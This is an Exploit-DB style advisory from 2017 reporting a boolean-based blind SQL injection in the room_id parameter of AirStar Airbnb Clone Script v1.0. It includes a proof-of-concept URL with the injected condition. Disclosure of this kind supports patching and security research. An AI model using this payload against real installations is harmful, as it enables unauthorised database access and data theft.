34 lines
No EOL
989 B
Text
34 lines
No EOL
989 B
Text
# Exploit Title: AirStar Airbnb Clone Script v1.0 - SQL Injection
|
|
# Date: 2017-09-11
|
|
# Exploit Author: 8bitsec
|
|
# Vendor Homepage: https://www.abservetech.com/
|
|
# Software Link: https://www.abservetech.com/airstar-airbnb-clone/
|
|
# Version: 1.0
|
|
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
|
|
# Email: contact@8bitsec.io
|
|
# Contact: https://twitter.com/_8bitsec
|
|
|
|
Release Date:
|
|
=============
|
|
2017-09-11
|
|
|
|
Product & Service Introduction:
|
|
===============================
|
|
AirStar Airbnb Clone Script
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
|
|
Blind SQL injection on [room_id] parameter.
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
|
|
http://localhost/[path]/airstar/hotel/roomsedit/detailedroom/6 AND 8995=8995?mem_count=1&check_in=&check_out=&search_city=Madurai,India&min_amt=10&max_amt=150&inout=0
|
|
|
|
Parameter: #1 (URI)
|
|
Type: boolean-based blind
|
|
Title: AND boolean-based blind - WHERE or HAVING clause
|
|
|
|
==================
|
|
8bitsec - [https://twitter.com/_8bitsec] |